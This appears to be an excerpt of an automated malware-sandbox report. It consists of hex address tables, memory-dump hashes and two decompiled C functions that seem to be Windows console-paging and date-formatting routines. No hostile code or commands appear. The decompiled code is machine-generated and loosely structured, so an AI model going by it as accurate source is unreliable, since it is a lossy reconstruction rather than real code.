                                                    0x011efc6b
                                                    0x011efc74
                                                    0x011efc76
                                                    0x011efc7a
                                                    0x011efc80
                                                    0x011efeaa
                                                    0x011efeaa
                                                    0x011efeaa
                                                    0x00000000
                                                    0x011efeaa
                                                    0x011efc86
                                                    0x011efc8d
                                                    0x00000000
                                                    0x00000000
                                                    0x011efc98
                                                    0x011efca2
                                                    0x011efcab
                                                    0x011efcb7
                                                    0x011efcc2
                                                    0x011efcc5
                                                    0x011efcdb
                                                    0x011efce0
                                                    0x011efce2
                                                    0x011efe8b
                                                    0x011efe90
                                                    0x011efe97
                                                    0x011efe9c
                                                    0x011efea3
                                                    0x011efea9
                                                    0x00000000
                                                    0x011efea9
                                                    0x011efce8
                                                    0x011efcef
                                                    0x011efcf1
                                                    0x011efcf3
                                                    0x011efcf3
                                                    0x011efd09
                                                    0x011efd0e
                                                    0x011efd10
                                                    0x00000000
                                                    0x011efd16
                                                    0x011efd16
                                                    0x011efd1d
                                                    0x011efd1f
                                                    0x011efd21
                                                    0x011efd21
                                                    0x011efd35
                                                    0x011efd3b
                                                    0x011efd3f
                                                    0x011efd42
                                                    0x011efd6f
                                                    0x011efd75
                                                    0x011efd7a
                                                    0x011efd7c
                                                    0x011efd7e
                                                    0x011efd94
                                                    0x011efd99
                                                    0x011efda4
                                                    0x011efdda
                                                    0x011efde5
                                                    0x011efe29
                                                    0x011efe2a
                                                    0x011efe2a
                                                    0x011efe2d
                                                    0x011efe32
                                                    0x011efe36
                                                    0x011efe38
                                                    0x011efe40
                                                    0x011efe49
                                                    0x011efe4e
                                                    0x011efe56
                                                    0x011efe5c
                                                    0x011efe65
                                                    0x011efe65
                                                    0x011efe6f
                                                    0x011efe76
                                                    0x011efe7b
                                                    0x00000000
                                                    0x011efe7b
                                                    0x011efdef
                                                    0x011efe00
                                                    0x011efe04
                                                    0x011efe06
                                                    0x00000000
                                                    0x00000000
                                                    0x011efe10
                                                    0x011efe10
                                                    0x011efe12
                                                    0x011efe19
                                                    0x011efe19
                                                    0x011efe21
                                                    0x00000000
                                                    0x011efe21
                                                    0x011efdae
                                                    0x011efdbf
                                                    0x011efdc3
                                                    0x011efdc5
                                                    0x00000000
                                                    0x00000000
                                                    0x011efdd1
                                                    0x00000000
                                                    0x011efdd1
                                                    0x011efd80
                                                    0x00000000
                                                    0x011efd44
                                                    0x011efd44
                                                    0x011efd49
                                                    0x011efd4e
                                                    0x011efd85
                                                    0x011efd85
                                                    0x011efe7f
                                                    0x011efe83
                                                    0x00000000
                                                    0x011efe83
                                                    0x011efd42
                                                    0x011efa8c
                                                    0x011efa8e
                                                    0x011efa9b
                                                    0x011efaa1
                                                    0x011efaad
                                                    0x011efab5
                                                    0x011efabd
                                                    0x011efac4
                                                    0x011efacf
                                                    0x011efad2
                                                    0x011efae8
                                                    0x011efaed
                                                    0x011efaef
                                                    0x011efb08
                                                    0x011efb0d
                                                    0x011efb11
                                                    0x011efb13
                                                    0x011efb27
                                                    0x011efb2e
                                                    0x011efb30
                                                    0x011efb32
                                                    0x011efb32
                                                    0x011efb4c
                                                    0x011efb51
                                                    0x011efb53
                                                    0x011efc08
                                                    0x011efc10
                                                    0x00000000
                                                    0x011efb59
                                                    0x011efb59
                                                    0x011efb60
                                                    0x011efb62
                                                    0x011efb64
                                                    0x011efb64
                                                    0x011efb79
                                                    0x011efb7f
                                                    0x011efb81
                                                    0x00000000
                                                    0x011efb87
                                                    0x011efb95
                                                    0x011efb9b
                                                    0x011efb9d
                                                    0x00000000
                                                    0x00000000
                                                    0x011efb9f
                                                    0x011efba4
                                                    0x011efba6
                                                    0x011efc17
                                                    0x011efc17
                                                    0x011efc18
                                                    0x011efc1d
                                                    0x011efc1f
                                                    0x011efc24
                                                    0x011efc26
                                                    0x011efc2a
                                                    0x011efc2e
                                                    0x011efc33
                                                    0x011efc33
                                                    0x011efc39
                                                    0x011efc3f
                                                    0x011efc46
                                                    0x011efc46
                                                    0x011efc41
                                                    0x011efc41
                                                    0x011efc41
                                                    0x011efc4b
                                                    0x011efc50
                                                    0x011efc57
                                                    0x011efc5d
                                                    0x011efc5f
                                                    0x00000000
                                                    0x011efc5f
                                                    0x011efbce
                                                    0x011efbd4
                                                    0x011efbd6
                                                    0x00000000
                                                    0x00000000
                                                    0x011efbdf
                                                    0x011efbe9
                                                    0x011efbf7
                                                    0x011efc03
                                                    0x011efc05
                                                    0x00000000
                                                    0x011efc05
                                                    0x011efb81
                                                    0x011efb53
                                                    0x011efb1d
                                                    0x00000000
                                                    0x011efb1d
                                                    0x011efaf9
                                                    0x00000000
                                                    0x011efaf9
                                                    0x011efa86
                                                    0x011ef9ee
                                                    0x011e65c6
                                                    0x011e65c6
                                                    0x00000000
                                                    0x011e65c6
                                                    0x011e65c1
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [...]$ [..]$ [.]$...$:
                                                    • API String ID: 0-1980097535
                                                    • Opcode ID: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                                    • Instruction ID: ea77946fa626a114de49e8e16eda3abfc1c29951bf69ad6101efbe4a57f21a6c
                                                    • Opcode Fuzzy Hash: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                                    • Instruction Fuzzy Hash: C112D2702047029BDB2DDFA8C888AAFB7E5FF98704F04491DFA8597281EB30D945CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DC5CA, Relevance: 30.2, APIs: 20, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E011DC5CA(void* __ecx, long __edx, void* _a4, signed int _a8) {
				signed int _v8;
				short _v16;
				short _v20;
				signed int _v26;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				signed int _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				long _v60;
				signed int _v64;
				void* _v68;
				long _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				char _v88;
				void* _v108;
				long _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t66;
				long _t68;
				long _t71;
				char* _t81;
				long _t85;
				intOrPtr _t88;
				signed int _t91;
				long _t93;
				long _t95;
				signed short _t100;
				struct _COORD _t105;
				void* _t114;
				void* _t115;
				long _t119;
				long _t122;
				signed int _t125;
				long _t128;
				void* _t138;
				void* _t141;
				void* _t143;
				signed int _t150;

				_t63 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t63 ^ _t150;
				_v64 = _a8;
				_t141 = __ecx;
				_v76 = __edx;
				_t137 = 0;
				_v72 = 0;
				_t66 = E011E269C(_a8);
				if(_t66 == 0) {
					L13:
					_t114 = 0;
				} else {
					__imp___get_osfhandle(__edx);
					_t114 = _t66;
					if(GetConsoleScreenBufferInfo(_t114,  &_v32) == 0) {
						goto L13;
					} else {
						_t137 = _v16 - _v20 - 1;
						_v72 = _t137;
					}
				}
				_v60 = _v60 & 0x00000000;
				_t119 = E011DC6F4(_t141, _a4, _v64);
				_t133 = 0x120b980;
				_v64 = _t119;
				_t142 = _t119;
				_v68 = 0x120b980;
				if(_t119 == 0) {
					_t68 = _v60;
					goto L11;
				} else {
					do {
						if(_t114 == 0) {
							_t119 = _v76;
							_t85 = E011E27C8(_t142 + _t142, _t133, _t142 + _t142,  &_v88);
							__eflags = _t85;
							if(_t85 == 0) {
								L16:
								_t68 = GetLastError();
								_v60 = _t68;
								break;
							} else {
								__eflags = _v88 - _t142 + _t142;
								if(_v88 == _t142 + _t142) {
									goto L9;
								} else {
									goto L16;
								}
							}
						} else {
							if( *0x1218065 != 0) {
								_t128 =  *0x121851c;
								__eflags = _t128 - _t137;
								if(_t128 < _t137) {
									L33:
									_t143 = _t133;
									_t88 = _t133 + _v64 * 2;
									_v84 = _t88;
									__eflags = _t133 - _t88;
									if(_t133 < _t88) {
										while(1) {
											__eflags = _t128 - _t137;
											if(_t128 >= _t137) {
												break;
											}
											_t91 =  *_t143 & 0x0000ffff;
											_t143 = _t143 + 2;
											__eflags = _t91 - 0xa;
											if(_t91 == 0xa) {
												_t128 = _t128 + 1;
												__eflags = _t128;
											}
											__eflags = _t143 - _v84;
											if(_t143 < _v84) {
												continue;
											}
											break;
										}
										 *0x121851c = _t128;
									}
									_t142 = _t143 - _t133 >> 1;
									goto L8;
								} else {
									 *0x121851c = 0;
									_t93 = GetConsoleScreenBufferInfo(_t114,  &_v32);
									__eflags = _t93;
									if(_t93 == 0) {
										L32:
										_t128 =  *0x121851c;
										_t133 = _v68;
										goto L33;
									} else {
										_t95 = WriteConsoleW(_t114,  *0x1218518,  *0x1218514,  &_v60, 0);
										__eflags = _t95;
										if(_t95 == 0) {
											goto L32;
										} else {
											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
											GetConsoleMode(_t114,  &_v80);
											_t100 = SetConsoleMode(_t114, 0);
											__imp___getch();
											_t137 = _t100 & 0x0000ffff;
											SetConsoleMode(_t114, _v80);
											GetConsoleScreenBufferInfo(_t114,  &_v56);
											_t133 = _v32.dwSize * _v26;
											_push( &_v60);
											_t105 = _v32.dwCursorPosition;
											_push(_t105);
											_t142 = _v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition;
											_push(_v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition);
											_push(0x20);
											_push(_t114);
											FillConsoleOutputCharacterW();
											SetConsoleCursorPosition(_t114, _v32.dwCursorPosition);
											__eflags = (_t100 & 0x0000ffff) - 3;
											if((_t100 & 0x0000ffff) == 3) {
												EnterCriticalSection( *0x1203858);
												 *0x11fd544 = 1;
												LeaveCriticalSection( *0x1203858);
												_t68 = 0;
												L12:
												return E011E6FD0(_t68, _t114, _v8 ^ _t150, _t133, _t137, _t142);
											} else {
												_t137 = _v72;
												goto L32;
											}
										}
									}
								}
							} else {
								_t142 = 0xa0;
								if(_t119 <= 0xa0) {
									_t142 = _t119;
								}
								L8:
								if(WriteConsoleW(_t114, _t133, _t142,  &_v60, 0) == 0) {
									_t68 = GetLastError();
								} else {
									L9:
									_t68 = 0;
								}
								goto L10;
							}
						}
						goto L55;
						L10:
						_t119 = _v64 - _t142;
						_v60 = _t68;
						_v64 = _t119;
						_t133 = _v68 + _t142 * 2;
						_v68 = _t133;
					} while (_t119 != 0);
					L11:
					if(_t68 != 0) {
						__eflags = _v76 - 2;
						if(__eflags != 0) {
							goto L12;
						} else {
							do {
								__eflags = E011E4B60(__eflags, 0);
							} while (__eflags == 0);
							exit(1);
							asm("int3");
							while(1) {
								L44:
								__eflags = _t133 - _t114;
								if(_t133 == _t114) {
									_t119 = _t119 + 2;
								}
								while(1) {
									_t134 = _t114;
									_t71 = E011DD7D4(_t119, _t114);
									_t122 = _t71;
									__eflags = _t122;
									if(_t122 == 0) {
										break;
									}
									_t119 = _t122 + 2;
									_t133 =  *_t119 & 0x0000ffff;
									__eflags = _t133 - 0x31 - 8;
									if(_t133 - 0x31 > 8) {
										goto L44;
									} else {
										_t142 = _t142 + 1;
										continue;
									}
									L24:
									__eflags = _v8 ^ _t150;
									return E011E6FD0(_t76, _t115, _v8 ^ _t150, _t134, _t137, _t142);
									goto L55;
								}
								_t115 = _v108;
								__eflags = _t142 - _a4;
								if(_t142 > _a4) {
									_t115 = HeapAlloc(GetProcessHeap(), 0, _t142 << 2);
									__eflags = _t115;
									if(_t115 != 0) {
										_t125 = 0;
										__eflags = _t142;
										if(_t142 != 0) {
											_t138 = _v108;
											_t134 = _a4;
											do {
												__eflags = _t125 - _t134;
												if(_t125 >= _t134) {
													_t81 = " ";
												} else {
													 *_t138 =  *_t138 + 4;
													_t81 =  *( *_t138 - 4);
												}
												 *(_t115 + _t125 * 4) = _t81;
												_t125 = _t125 + 1;
												__eflags = _t125 - _t142;
											} while (_t125 < _t142);
											_t137 = _v112;
										}
										_t142 = FormatMessageW(0x3800, 0, _t137, 0, 0x120b980, 0x2000, _t115);
										RtlFreeHeap(GetProcessHeap(), 0, _t115);
										goto L23;
									}
								} else {
									_push(_t115);
									_push(0x2000);
									_push(0x120b980);
									_push(_t71);
									_push(_t137);
									_push(_t71);
									_push(0x1800);
									_t142 = FormatMessageW();
									L23:
									_t76 = _t142;
								}
								goto L24;
							}
						}
					} else {
						goto L12;
					}
				}
				L55:
			}













































                                                    0x011dc5d2
                                                    0x011dc5d9
                                                    0x011dc5e3
                                                    0x011dc5e7
                                                    0x011dc5e9
                                                    0x011dc5ec
                                                    0x011dc5f0
                                                    0x011dc5f3
                                                    0x011dc5fa
                                                    0x011dc6b9
                                                    0x011dc6b9
                                                    0x011dc600
                                                    0x011dc601
                                                    0x011dc607
                                                    0x011dc617
                                                    0x00000000
                                                    0x011dc61d
                                                    0x011dc627
                                                    0x011dc628
                                                    0x011dc628
                                                    0x011dc617
                                                    0x011dc62e
                                                    0x011dc63c
                                                    0x011dc63e
                                                    0x011dc643
                                                    0x011dc646
                                                    0x011dc648
                                                    0x011dc64d
                                                    0x011dc6ef
                                                    0x00000000
                                                    0x011dc653
                                                    0x011dc653
                                                    0x011dc655
                                                    0x011dc6c4
                                                    0x011dc6cb
                                                    0x011dc6d0
                                                    0x011dc6d2
                                                    0x011dc6dc
                                                    0x011dc6dc
                                                    0x011dc6e2
                                                    0x00000000
                                                    0x011dc6d4
                                                    0x011dc6d7
                                                    0x011dc6da
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc6da
                                                    0x011dc657
                                                    0x011dc65e
                                                    0x011ead2a
                                                    0x011ead30
                                                    0x011ead32
                                                    0x011eae01
                                                    0x011eae04
                                                    0x011eae06
                                                    0x011eae09
                                                    0x011eae0c
                                                    0x011eae0e
                                                    0x011eae10
                                                    0x011eae10
                                                    0x011eae12
                                                    0x00000000
                                                    0x00000000
                                                    0x011eae14
                                                    0x011eae17
                                                    0x011eae1a
                                                    0x011eae1d
                                                    0x011eae1f
                                                    0x011eae1f
                                                    0x011eae1f
                                                    0x011eae20
                                                    0x011eae23
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011eae23
                                                    0x011eae25
                                                    0x011eae25
                                                    0x011eae2d
                                                    0x00000000
                                                    0x011ead38
                                                    0x011ead3f
                                                    0x011ead45
                                                    0x011ead4b
                                                    0x011ead4d
                                                    0x011eadf8
                                                    0x011eadf8
                                                    0x011eadfe
                                                    0x00000000
                                                    0x011ead53
                                                    0x011ead65
                                                    0x011ead6b
                                                    0x011ead6d
                                                    0x00000000
                                                    0x011ead73
                                                    0x011ead7c
                                                    0x011ead87
                                                    0x011ead8f
                                                    0x011ead95
                                                    0x011ead9e
                                                    0x011eada2
                                                    0x011eadad
                                                    0x011eadc2
                                                    0x011eadc9
                                                    0x011eadca
                                                    0x011eadd0
                                                    0x011eadda
                                                    0x011eaddc
                                                    0x011eaddd
                                                    0x011eaddf
                                                    0x011eade0
                                                    0x011eadea
                                                    0x011eadf0
                                                    0x011eadf3
                                                    0x011eae3a
                                                    0x011eae46
                                                    0x011eae50
                                                    0x011eae56
                                                    0x011dc6a6
                                                    0x011dc6b6
                                                    0x011eadf5
                                                    0x011eadf5
                                                    0x00000000
                                                    0x011eadf5
                                                    0x011eadf3
                                                    0x011ead6d
                                                    0x011ead4d
                                                    0x011dc664
                                                    0x011dc664
                                                    0x011dc66f
                                                    0x011dc671
                                                    0x011dc671
                                                    0x011dc673
                                                    0x011dc684
                                                    0x011dc6e7
                                                    0x011dc686
                                                    0x011dc686
                                                    0x011dc686
                                                    0x011dc686
                                                    0x00000000
                                                    0x011dc684
                                                    0x011dc65e
                                                    0x00000000
                                                    0x011dc688
                                                    0x011dc68e
                                                    0x011dc690
                                                    0x011dc693
                                                    0x011dc696
                                                    0x011dc699
                                                    0x011dc699
                                                    0x011dc69e
                                                    0x011dc6a0
                                                    0x011eae5d
                                                    0x011eae61
                                                    0x00000000
                                                    0x011eae67
                                                    0x011eae67
                                                    0x011eae6e
                                                    0x011eae6e
                                                    0x011eae74
                                                    0x011eae7a
                                                    0x011eae7b
                                                    0x011eae7b
                                                    0x011eae7b
                                                    0x011eae7e
                                                    0x011eae84
                                                    0x011eae84
                                                    0x011dc74b
                                                    0x011dc74b
                                                    0x011dc74d
                                                    0x011dc752
                                                    0x011dc754
                                                    0x011dc756
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc794
                                                    0x011dc797
                                                    0x011dc79d
                                                    0x011dc7a1
                                                    0x00000000
                                                    0x011dc7a7
                                                    0x011dc7a7
                                                    0x00000000
                                                    0x011dc7a7
                                                    0x011dc781
                                                    0x011dc786
                                                    0x011dc791
                                                    0x00000000
                                                    0x011dc791
                                                    0x011dc758
                                                    0x011dc75b
                                                    0x011dc75e
                                                    0x011eaea1
                                                    0x011eaea3
                                                    0x011eaea5
                                                    0x011eaeab
                                                    0x011eaead
                                                    0x011eaeaf
                                                    0x011eaeb1
                                                    0x011eaeb4
                                                    0x011eaeb7
                                                    0x011eaeb7
                                                    0x011eaeb9
                                                    0x011eaec5
                                                    0x011eaebb
                                                    0x011eaebb
                                                    0x011eaec0
                                                    0x011eaec0
                                                    0x011eaeca
                                                    0x011eaecd
                                                    0x011eaece
                                                    0x011eaece
                                                    0x011eaed2
                                                    0x011eaed2
                                                    0x011eaef3
                                                    0x011eaefc
                                                    0x00000000
                                                    0x011eaefc
                                                    0x011dc764
                                                    0x011dc764
                                                    0x011dc765
                                                    0x011dc76a
                                                    0x011dc76f
                                                    0x011dc770
                                                    0x011dc771
                                                    0x011dc772
                                                    0x011dc77d
                                                    0x011dc77f
                                                    0x011dc77f
                                                    0x011dc77f
                                                    0x00000000
                                                    0x011dc75e
                                                    0x011eae7b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc6a0
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                                    • _get_osfhandle.MSVCRT ref: 011DC601
                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,011DC5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011DC60F
                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0120B980,000000A0,00000000,00000000,?,?,?,?,?), ref: 011DC67C
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 011DC6DC
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC6E7
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                    • String ID:
                                                    • API String ID: 2173784998-0
                                                    • Opcode ID: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                                    • Instruction ID: 893abb90bef1201fcfc3a439baa35969891ca4895b4f03057563b492d7a5f580
                                                    • Opcode Fuzzy Hash: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                                    • Instruction Fuzzy Hash: 16818271E00119AFDF28DFA8F89CABEBBB9EF54715F01442AE906D7244DB309941CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D5AEF, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 367timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E011D5AEF(void* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				signed int _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				intOrPtr _t89;
				void* _t90;
				signed int _t96;
				signed int _t97;
				void* _t100;
				void* _t101;
				void* _t110;
				void* _t111;
				signed short _t118;
				long _t128;
				short* _t130;
				void* _t136;
				signed int _t139;
				void* _t143;
				void _t145;
				void _t149;
				signed int _t157;
				signed int _t159;
				signed int _t161;
				int _t164;
				void* _t172;
				signed int _t173;
				signed int _t181;
				signed int _t185;
				void* _t186;
				void* _t189;
				intOrPtr _t197;
				signed int _t202;
				void* _t206;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t78 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t78 ^ _t212;
				_t157 = _a4;
				_v364 = __edx;
				_v368 = _t157;
				_v360 = 1;
				if(__ecx != 0) {
					_t161 = 9;
					memcpy( &_v420, __ecx, _t161 << 2);
					_t213 = _t213 + 0xc;
					E011F3C49( &_v420,  &_v376);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v376);
				}
				FileTimeToLocalFileTime( &_v376,  &_v384);
				FileTimeToSystemTime( &_v384,  &_v348);
				_v352 = 0;
				if( *0x1213cc9 == 0) {
					_t194 = _v348 & 0x0000ffff;
					_t208 = _v346 & 0x0000ffff;
					_t206 = _v342 & 0x0000ffff;
					_v352 = _t194;
					if(_v364 == 0) {
						_t181 = 0x64;
						_t194 = _t194 % _t181;
						_v352 = _t194;
					}
					_t89 =  *0x11fd540; // 0x0
					if(_t89 != 2) {
						if(_t89 == 1) {
							_t110 = _t208;
							_t208 = _t206;
							_t206 = _t110;
						}
					} else {
						_t111 = _t194;
						_t194 = _t206;
						_t206 = _t208;
						_v352 = _t194;
						_t208 = _t111;
					}
					_t164 =  *0x11fd598; // 0x0
					if(_t164 >= 0x20) {
						_t90 =  *0x11fd594; // 0x0
						goto L63;
					} else {
						_t90 = realloc( *0x11fd594, 0x40);
						_pop(0);
						if(_t90 != 0) {
							_t194 = _v352;
							_t164 = 0x20;
							 *0x11fd594 = _t90;
							 *0x11fd598 = _t164;
							L63:
							_push(_t194);
							_push(0x11ff80c);
							_push(_t206);
							_push(0x11ff80c);
							E011E274C(_t90, _t164, L"%02d%s%02d%s%02d", _t208);
							_t213 = _t213 + 0x20;
							_t206 = 2;
							goto L35;
						}
						_push(_t90);
						goto L50;
					}
				} else {
					_v356 = 0;
					if(GetLocaleInfoW(E011E41A4(), 0x1f,  &_v332, 0x80) == 0) {
						_t194 = 0x80;
						E011E1040( &_v332, 0x80,  *0x11ff7f8);
					}
					_t118 = _v332;
					_t210 =  &_v332;
					_t206 = 2;
					if(_t118 == 0) {
						L13:
						if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332,  *0x11fd594,  *0x11fd598) == 0) {
							L32:
							_t208 = GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, 0, 0);
							if(_t208 == 0) {
								_t128 = GetLastError();
								_push(0);
								L48:
								 *0x1213cf0 = _t128;
								_push(_t128);
								L51:
								E011DC5A2(0);
								_t97 = 0;
								L25:
								return E011E6FD0(_t97, _t157, _v8 ^ _t212, _t194, _t206, _t208);
							}
							_t208 = _t208 + 1;
							_t130 = realloc( *0x11fd594, _t208 + _t208);
							_pop(0);
							if(_t130 == 0) {
								_push(0);
								L50:
								_push(8);
								goto L51;
							}
							 *0x11fd594 = _t130;
							 *0x11fd598 = _t208;
							_t208 = 0;
							if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, _t130, 0) == 0) {
								_t128 = GetLastError();
								_push(0);
								goto L48;
							}
							L35:
							_t208 =  *0x11fd594; // 0x0
							L15:
							_push(E011D5AA7(_v344 & 0x0000ffff));
							_t194 = 0x20;
							E011E1040( &_v76, _t194);
							if(_t157 == 0) {
								if(_v360 != 0) {
									if(E011D68B5() == 0) {
										_push(_t208);
										_push( &_v76);
									} else {
										_push( &_v76);
										_push(_t208);
									}
									_t96 = E011E25D9(L"%s %s ");
								} else {
									_push(_t208);
									_t96 = E011E25D9(L"%s ");
								}
								_t157 = _t96;
								L24:
								_t97 = _t157;
								goto L25;
							}
							if(_v360 == 0 || _v364 != 1) {
								E011E1040(_t157, _a8, _t208);
							} else {
								_t101 = E011D68B5();
								_t197 = _a8;
								_t173 = _t157;
								if(_t101 != 0) {
									E011E1040(_t173, _t197, _t208);
									E011E18C0(_t157, _a8, " ");
									_push( &_v76);
								} else {
									E011E1040(_t173, _t197,  &_v76);
									E011E18C0(_t157, _a8, " ");
									_push(_t208);
								}
								E011E18C0(_t157, _a8);
							}
							_t172 = _t157 + 2;
							_t194 = 0;
							do {
								_t100 =  *_t157;
								_t157 = _t206 + _t157;
							} while (_t100 != 0);
							_t157 = _t157 - _t172 >> 1;
							goto L24;
						}
						_t208 =  *0x11fd594; // 0x0
						if(_t208 == 0) {
							goto L32;
						}
						goto L15;
					} else {
						_t159 = _v356;
						_t185 = _t118 & 0x0000ffff;
						_t136 = 0x64;
						do {
							if(_t185 == 0x27) {
								_t210 = _t210 + _t206;
								_t159 = 0 | _t159 == 0x00000000;
								goto L11;
							}
							if(_t159 != 0 || _t185 != _t136 && _t185 != 0x4d) {
								_t210 = _t210 + _t206;
							} else {
								_t202 = 0;
								do {
									_t210 = _t210 + _t206;
									_t202 = _t202 + 1;
								} while ( *_t210 == _t185);
								_v356 = _t210;
								_t211 = _t210 +  ~_t202 * 2;
								if(_t202 != 1) {
									_t143 = 0x64;
									if(_t185 == _t143) {
										_v360 = 0;
									}
									if(_t202 <= 3) {
										_t210 = _v356;
									} else {
										_t194 = _v356;
										_t186 = _t194;
										_v356 = _t186 + 2;
										do {
											_t145 =  *_t186;
											_t186 = _t186 + _t206;
										} while (_t145 != _v352);
										_t210 = _t211 + 6;
										memmove(_t210, _t194, 2 + (_t186 - _v356 >> 1) * 2);
										_t213 = _t213 + 0xc;
									}
									goto L11;
								}
								_t189 = _t211;
								_t194 = _t189 + 2;
								do {
									_t149 =  *_t189;
									_t189 = _t189 + _t206;
								} while (_t149 != _v352);
								memmove(_t211 + 2, _t211, 2 + (_t189 - _t194 >> 1) * 2);
								_t213 = _t213 + 0xc;
								_t210 = _t211 + 4;
							}
							L11:
							_t139 =  *_t210 & 0x0000ffff;
							_t185 = _t139;
							_t136 = 0x64;
						} while (_t139 != 0);
						_t157 = _v368;
						goto L13;
					}
				}
			}























































                                                    0x011d5afa
                                                    0x011d5b01
                                                    0x011d5b05
                                                    0x011d5b0b
                                                    0x011d5b11
                                                    0x011d5b17
                                                    0x011d5b24
                                                    0x011e9ae4
                                                    0x011e9aeb
                                                    0x011e9aeb
                                                    0x011e9af9
                                                    0x011d5b2a
                                                    0x011d5b31
                                                    0x011d5b45
                                                    0x011d5b45
                                                    0x011d5b59
                                                    0x011d5b6d
                                                    0x011d5b75
                                                    0x011d5b81
                                                    0x011e9bba
                                                    0x011e9bc1
                                                    0x011e9bc8
                                                    0x011e9bcf
                                                    0x011e9bdb
                                                    0x011e9be3
                                                    0x011e9be4
                                                    0x011e9be6
                                                    0x011e9be6
                                                    0x011e9bec
                                                    0x011e9bf4
                                                    0x011e9c09
                                                    0x011e9c0b
                                                    0x011e9c0d
                                                    0x011e9c0f
                                                    0x011e9c0f
                                                    0x011e9bf6
                                                    0x011e9bf6
                                                    0x011e9bf8
                                                    0x011e9bfa
                                                    0x011e9bfc
                                                    0x011e9c02
                                                    0x011e9c02
                                                    0x011e9c11
                                                    0x011e9c1a
                                                    0x011e9c4c
                                                    0x00000000
                                                    0x011e9c1c
                                                    0x011e9c24
                                                    0x011e9c2b
                                                    0x011e9c2e
                                                    0x011e9c36
                                                    0x011e9c3e
                                                    0x011e9c3f
                                                    0x011e9c44
                                                    0x011e9c51
                                                    0x011e9c51
                                                    0x011e9c57
                                                    0x011e9c58
                                                    0x011e9c59
                                                    0x011e9c62
                                                    0x011e9c67
                                                    0x011e9c6c
                                                    0x00000000
                                                    0x011e9c6c
                                                    0x011e9c30
                                                    0x00000000
                                                    0x011e9c30
                                                    0x011d5b87
                                                    0x011d5b87
                                                    0x011d5baa
                                                    0x011e9b09
                                                    0x011e9b11
                                                    0x011e9b11
                                                    0x011d5bb0
                                                    0x011d5bb7
                                                    0x011d5bbf
                                                    0x011d5bc3
